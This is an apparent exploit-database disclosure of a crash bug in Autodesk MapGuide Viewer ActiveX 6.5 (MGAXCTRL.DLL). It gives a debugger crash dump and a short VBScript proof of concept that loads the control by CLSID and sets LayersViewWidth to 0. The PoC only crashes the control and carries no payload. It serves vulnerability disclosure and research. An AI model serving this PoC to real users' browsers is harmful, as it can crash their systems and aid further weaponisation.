# Exploit Title: Autodesk MapGuide Viewer ActiveX(MGAXCTRL.DLL)Overflow Vulnerability # Date: [01-09-2010] # Author: [d3b4g] # Software Link: http://usa.autodesk.com/adsk/servlet/item?siteID=123112&id=9454821 # Version: [6.5] # Tested on: [Winxp SP3] # regards to ROL guys
Exception Code: ACCESS_VIOLATION Disasm: 175CE9E CMP DWORD PTR [ESI+1C],0 (MGAXCTRL.DLL)
Seh Chain: -------------------------------------------------- 1 192847C MGAXCTRL.DLL 2 73352542 VBSCRIPT.dll 3 7C839AD8 KERNEL32.dll
Registers: -------------------------------------------------- EIP 0175CE9E EAX 00000001 EBX 003EB690 -> 0193F684 ECX 00000000 EDX 003E0608 -> 00180F98 EDI 003EB5D8 -> 0193FC24 ESI 00000404 EBP 0013EA84 -> 0013EAA0 ESP 0013EA58 -> 003EB644
ArgDump: -------------------------------------------------- EBP+8 003EB644 -> 0193F90C EBP+12 00000000 EBP+16 0013EAD4 -> 00130000 EBP+20 0042C4F4 -> 00110024 EBP+24 0013EA94 -> 0013EAD4 EBP+28 0013EB30 -> 0013EBC0
Block Disassembly: -------------------------------------------------- 175CE8F POP ESI 175CE90 JMP [EAX+60] 175CE93 PUSH ESI 175CE94 LEA ESI,[ECX+404] 175CE9A TEST ESI,ESI 175CE9C JE SHORT 0175CEC2 175CE9E CMP DWORD PTR [ESI+1C],0 <--- CRASH 175CEA2 JE SHORT 0175CEC2 175CEA4 PUSH 0 175CEA6 PUSH DWORD PTR [ESP+C] 175CEAA MOV ECX,ESI 175CEAC PUSH 0 175CEAE CALL 01912C63 175CEB3 MOV EAX,[ESI] 175CEB5 MOV ECX,ESI
PoC:
<object classid='clsid:62789780-B744-11D0-986B-00609731A21D' id='target' /> <script language='vbscript'>
'File Generated by COMRaider v0.0.133 - http://labs.idefense.com
'Wscript.echo typename(target)
'for debugging/custom prolog targetFile = "C:\Program Files\Autodesk\MapGuideViewerActiveX6.5\MgAxCtrl.dll" prototype = "Property Let LayersViewWidth As Long" memberName = "LayersViewWidth" progid = "MGMapControl.MGMap" argCount = 1
arg1=0
target.LayersViewWidth = arg1
</script>
|